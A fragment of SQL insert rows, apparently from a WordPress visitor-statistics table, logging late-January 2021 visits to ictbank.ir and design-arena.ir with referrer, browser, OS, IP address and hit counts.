(8307,'2021-01-25','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','92.249.34.145','000',0,1,0),
(8308,'2021-01-25','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','106.45.9.202','000',0,1,0),
(8309,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.231.33.108','000',0,2,0),
(8310,'2021-01-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(8311,'2021-01-25','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.182.28','000',0,2,0),
(8312,'2021-01-25','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','93.74.50.200','000',0,2,0),
(8313,'2021-01-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.238.176.151','000',0,2,0),
(8314,'2021-01-25','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.41.176.238','000',0,1,0),
(8315,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.126.43','000',0,1,0),
(8316,'2021-01-25','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.73.221.89','000',0,4,0),
(8317,'2021-01-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8318,'2021-01-25','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','14.175.159.219','000',0,2,0),
(8319,'2021-01-25','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','186.134.57.86','000',0,1,0),
(8320,'2021-01-25','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','195.154.51.48','000',0,2,0),
(8321,'2021-01-25','http://ictbank.ir/blog','Facebook','iOS','12.3.1',NULL,NULL,'','5.180.62.94','000',0,1,0),
(8322,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.71.104','000',0,1,0),
(8323,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','168.119.101.117','000',0,1,0),
(8324,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.42.92.122','000',0,4,0),
(8325,'2021-01-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','171.248.177.179','000',0,3,0),
(8326,'2021-01-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.104.184.4','000',0,2,0),
(8327,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.232.43.193','000',0,3,0),
(8328,'2021-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8329,'2021-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8330,'2021-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(8331,'2021-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8332,'2021-01-25','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','84.17.62.235','000',0,2,0),
(8333,'2021-01-25','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(8334,'2021-01-25','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.212.171.196','000',0,2,0),
(8335,'2021-01-25','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','193.218.39.39','000',0,1,0),
(8336,'2021-01-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.223.88.215','000',0,1,0),
(8337,'2021-01-26','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','91.192.157.212','000',0,2,0),
(8338,'2021-01-26','http://ictbank.ir/blog','Opera Mobile','Android','5.0.2',NULL,NULL,'','141.98.103.228','000',0,2,0),
(8339,'2021-01-26','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','194.35.233.203','000',0,2,0),
(8340,'2021-01-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8341,'2021-01-26','http://ictbank.ir/blog','Safari','Windows','10.0',NULL,NULL,'','93.177.73.202','000',0,3,0),
(8342,'2021-01-26','http://ictbank.ir/blog','Unknown','iOS','11.3',NULL,NULL,'','27.224.136.65','000',0,1,0),
(8343,'2021-01-26','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','74.135.233.1','000',0,1,0),
(8344,'2021-01-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(8345,'2021-01-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','178.159.3.175','000',0,2,0),
(8346,'2021-01-26','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.230.191.30','000',0,1,0),
(8347,'2021-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.238.67','000',0,1,0),
(8348,'2021-01-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.216.35.121','000',0,2,0),
(8349,'2021-01-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(8350,'2021-01-26','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.237.20.137','000',0,1,0),
(8351,'2021-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.97.169','000',0,1,0),
(8352,'2021-01-26','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.137.148','000',0,1,0),
(8353,'2021-01-26','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','77.81.139.164','000',0,2,0),
(8354,'2021-01-26','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','112.80.138.124','000',0,1,0),
(8355,'2021-01-26','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','88.233.10.90','000',0,2,0),
(8356,'2021-01-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','221.213.75.59','000',0,1,0),
(8357,'2021-01-26','https://www.google.com/','Chrome','Android','5.1.1',NULL,NULL,'','5.172.255.37','000',0,1,0),
(8358,'2021-01-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8359,'2021-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8360,'2021-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(8361,'2021-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(8362,'2021-01-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.120.203.172','000',0,2,0),
(8363,'2021-01-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.94.75.216','000',0,8,0),
(8364,'2021-01-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(8365,'2021-01-26','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','185.93.2.40','000',0,2,0),
(8366,'2021-01-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8367,'2021-01-27','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.230.191.30','000',0,1,0),
(8368,'2021-01-27','http://ictbank.ir/blog','UC Browser','Android','5.1',NULL,NULL,'','194.110.84.179','000',0,2,0),
(8369,'2021-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.242.105.44','000',0,1,0),
(8370,'2021-01-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','202.130.117.166','000',0,1,0),
(8371,'2021-01-27','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','45.12.223.228','000',0,2,0),
(8372,'2021-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.4.223','000',0,2,0),
(8373,'2021-01-27','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','178.175.132.70','000',0,4,0),
(8374,'2021-01-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,1,0),
(8375,'2021-01-27','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','82.102.18.110','000',0,2,0),
(8376,'2021-01-27','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.228.170.58','000',0,1,0),
(8377,'2021-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.19.198','000',0,1,0),
(8378,'2021-01-27','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','203.106.98.246','000',0,2,0),
(8379,'2021-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.239.160.198','000',0,2,0),
(8380,'2021-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','173.249.5.142','000',0,1,0),
(8381,'2021-01-27','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','5.101.136.148','000',0,2,0),
(8382,'2021-01-27','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.22.97.208','000',0,1,0),
(8383,'2021-01-27','http://design-arena.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','132.148.39.139','000',0,1,0),
(8384,'2021-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.58.128','000',0,1,0),
(8385,'2021-01-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.245.85.172','000',0,2,0),
(8386,'2021-01-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,1,0),
(8387,'2021-01-27','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','196.196.203.124','000',0,2,0),
(8388,'2021-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(8389,'2021-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(8390,'2021-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8391,'2021-01-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','116.203.127.151','000',0,1,0),
(8392,'2021-01-27','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','105.161.85.45','000',0,1,0),
(8393,'2021-01-27','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','82.136.68.6','000',0,1,0),
(8394,'2021-01-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.56.252.100','000',0,2,0),
(8395,'2021-01-28','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.232.196.119','000',0,1,0),
(8396,'2021-01-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,1,0),
(8397,'2021-01-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','194.110.84.137','000',0,2,0),
(8398,'2021-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8399,'2021-01-28','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','190.27.146.87','000',0,1,0),
(8400,'2021-01-28','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','217.138.192.52','000',0,2,0),
(8401,'2021-01-28','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.89.190','000',0,1,0),
(8402,'2021-01-28','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','82.102.18.110','000',0,2,0),
(8403,'2021-01-28','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','5.113.163.16','000',0,5,0),
(8404,'2021-01-28','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.3',NULL,NULL,'','89.36.224.7','000',0,2,0),
(8405,'2021-01-28','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','195.154.51.48','000',0,2,0),
(8406,'2021-01-28','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','36.72.204.75','000',0,2,0),
(8407,'2021-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.189.207','000',0,1,0),
(8408,'2021-01-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','141.98.103.140','000',0,2,0),
(8409,'2021-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(8410,'2021-01-28','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','37.120.217.196','000',0,2,0),
(8411,'2021-01-28','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.75.60','000',0,1,0),
(8412,'2021-01-28','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','121.196.155.249','000',0,1,0),
(8413,'2021-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.141.66','000',0,1,0),
(8414,'2021-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,4,0),
(8415,'2021-01-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.173.224.26','000',0,1,0),
(8416,'2021-01-28','http://ictbank.ir/blog','Android Browser','Android','4.4.4',NULL,NULL,'','217.138.197.68','000',0,2,0),
(8417,'2021-01-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8418,'2021-01-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8419,'2021-01-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.152.181.20','000',0,2,0),
(8420,'2021-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(8421,'2021-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(8422,'2021-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(8423,'2021-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(8424,'2021-01-28','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,2,0),
(8425,'2021-01-28','http://ictbank.ir/blog','Facebook','iOS','12.4.1',NULL,NULL,'','195.181.173.201','000',0,2,0),
(8426,'2021-01-28','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','170.254.192.42','000',0,2,0),
(8427,'2021-01-29','http://ictbank.ir/blog','Instagram','iOS','11.4',NULL,NULL,'','185.216.35.121','000',0,2,0),
(8428,'2021-01-29','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','45.147.246.173','000',0,13,0),
(8429,'2021-01-29','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','212.168.31.17','000',0,1,0),
(8430,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.235.138.103','000',0,1,0),
(8431,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.198.205.123','000',0,1,0),
(8432,'2021-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,2,0),
(8433,'2021-01-29','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','185.142.26.195','000',0,2,0),
(8434,'2021-01-29','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.230.150.144','000',0,1,0),
(8435,'2021-01-29','http://ictbank.ir/blog','UC Browser','Android','7.0',NULL,NULL,'','193.56.252.100','000',0,2,0),
(8436,'2021-01-29','http://www.google.com/','Chrome','Android','7.0',NULL,NULL,'','83.27.175.198','000',0,3,0),
(8437,'2021-01-29','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','185.245.84.188','000',0,2,0),
(8438,'2021-01-29','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','119.93.199.72','000',0,2,0),
(8439,'2021-01-29','http://ictbank.ir/blog','Opera','Windows','6.2',NULL,NULL,'','185.17.27.121','000',0,2,0),
(8440,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.68.115','000',0,1,0),
(8441,'2021-01-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(8442,'2021-01-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8443,'2021-01-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','178.239.168.190','000',0,2,0),
(8444,'2021-01-29','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.175.187.186','000',0,1,0),
(8445,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.89.64.64','000',0,1,0),
(8446,'2021-01-29','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','45.152.181.20','000',0,2,0),
(8447,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','47.242.212.73','000',0,2,0),
(8448,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.108.167','000',0,1,0),
(8449,'2021-01-29','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.21.157','000',0,1,0),
(8450,'2021-01-29','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','178.175.132.28','000',0,2,0),
(8451,'2021-01-29','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,6,0),
(8452,'2021-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8453,'2021-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8454,'2021-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(8455,'2021-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(8456,'2021-01-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','211.254.114.31','000',0,3,0),
(8457,'2021-01-29','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','197.32.156.20','000',0,1,0),
(8458,'2021-01-29','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','116.203.194.206','000',0,1,0),
(8459,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','119.39.47.174','000',0,1,0),
(8460,'2021-01-29','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','150.136.62.105','000',0,1,0),
(8461,'2021-01-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','206.189.117.9','000',0,1,0),
(8462,'2021-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','86.105.132.27','000',0,1,0),
(8463,'2021-01-29','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','195.140.213.34','000',0,2,0),
(8464,'2021-01-30','http://design-arena.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','150.136.62.105','000',0,2,0),
(8465,'2021-01-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','37.120.194.218','000',0,2,0),
(8466,'2021-01-30','http://ictbank.ir/blog','UC Browser','Android','2.3.1',NULL,NULL,'','185.114.224.107','000',0,2,0),
(8467,'2021-01-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.119','000',0,1,0),
(8468,'2021-01-30','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','192.241.235.210','000',0,1,0),
(8469,'2021-01-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8470,'2021-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.158','000',0,1,0),
(8471,'2021-01-30','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','195.154.40.254','000',0,2,0),
(8472,'2021-01-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','110.143.198.245','000',0,3,0),
(8473,'2021-01-30','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.33.169','000',0,1,0),
(8474,'2021-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(8475,'2021-01-30','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','51.159.90.177','000',0,2,0),
(8476,'2021-01-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.253.18','000',0,1,0),
(8477,'2021-01-30','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','41.107.180.158','000',0,1,0),
(8478,'2021-01-30','http://design-arena.ir/blog','Firefox Mobile','Android','8.0.0',NULL,NULL,'','116.203.177.227','000',0,1,0),
(8479,'2021-01-30','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','217.146.82.187','000',0,2,0),
(8480,'2021-01-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.22.66','000',0,1,0),
(8481,'2021-01-30','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.130','000',0,1,0),
(8482,'2021-01-30','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','195.140.213.34','000',0,2,0),
(8483,'2021-01-30','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','109.134.222.60','000',0,5,0),
(8484,'2021-01-30','www.google.com','Unknown','Android','7.0',NULL,NULL,'','185.239.242.125','000',0,2,0),
(8485,'2021-01-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.157.77.32','000',0,1,0),
(8486,'2021-01-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','107.172.183.231','000',0,1,0),
(8487,'2021-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,2,0),
(8488,'2021-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8489,'2021-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(8490,'2021-01-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.87.232.74','000',0,1,0),
(8491,'2021-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,2,0),
(8492,'2021-01-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8493,'2021-01-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','178.239.168.190','000',0,2,0),
(8494,'2021-01-30','www.google.com','Unknown','Android','7.0',NULL,NULL,'','37.46.150.237','000',0,1,0),
(8495,'2021-01-30','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.85.183','000',0,1,0),
(8496,'2021-01-31','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','63.33.62.55','000',0,1,0),
(8497,'2021-01-31','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','197.41.118.129','000',0,2,0),
(8498,'2021-01-31','http://ictbank.ir/blog','Facebook','iOS','12.3.1',NULL,NULL,'','178.239.168.190','000',0,2,0),
(8499,'2021-01-31','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.36.113.142','000',0,1,0),
(8500,'2021-01-31','http://82.102.9.14/blog','Edge','Windows','10.0',NULL,NULL,'','2.57.122.10','000',0,1,0),
(8501,'2021-01-31','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','217.146.82.197','000',0,2,0),
(8502,'2021-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.22.99','000',0,1,0),
(8503,'2021-01-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8504,'2021-01-31','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','37.120.209.220','000',0,4,0),
(8505,'2021-01-31','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','91.214.221.166','000',0,2,0),
(8506,'2021-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.113.3','000',0,1,0),
(8507,'2021-01-31','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.191.81.53','000',0,1,0),
(8508,'2021-01-31','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','185.230.127.84','000',0,2,0),
(8509,'2021-01-31','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.230.119.177','000',0,1,0),
(8510,'2021-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.144','000',0,1,0),
(8511,'2021-01-31','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.140.207.49','000',0,1,0),
(8512,'2021-01-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(8513,'2021-01-31','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','196.245.151.4','000',0,2,0),
(8514,'2021-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.54.169','000',0,1,0),
(8515,'2021-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','86.105.132.27','000',0,1,0),
(8516,'2021-01-31','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','83.23.229.49','000',0,2,0),
(8517,'2021-01-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','18.191.34.202','000',0,33,0),
(8518,'2021-01-31','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','45.83.91.236','000',0,2,0),
(8519,'2021-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(8520,'2021-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8521,'2021-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(8522,'2021-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8523,'2021-01-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8524,'2021-01-31','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','195.181.170.158','000',0,2,0),
(8525,'2021-01-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(8526,'2021-01-31','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.105.164','000',0,1,0),
(8527,'2021-02-01','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.233.99.161','000',0,1,0),
(8528,'2021-02-01','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','195.154.51.48','000',0,2,0),
(8529,'2021-02-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(8530,'2021-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.67.25','000',0,1,0),
(8531,'2021-02-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','81.70.10.227','000',0,3,0),
(8532,'2021-02-01','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(8533,'2021-02-01','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','185.212.171.206','000',0,2,0),
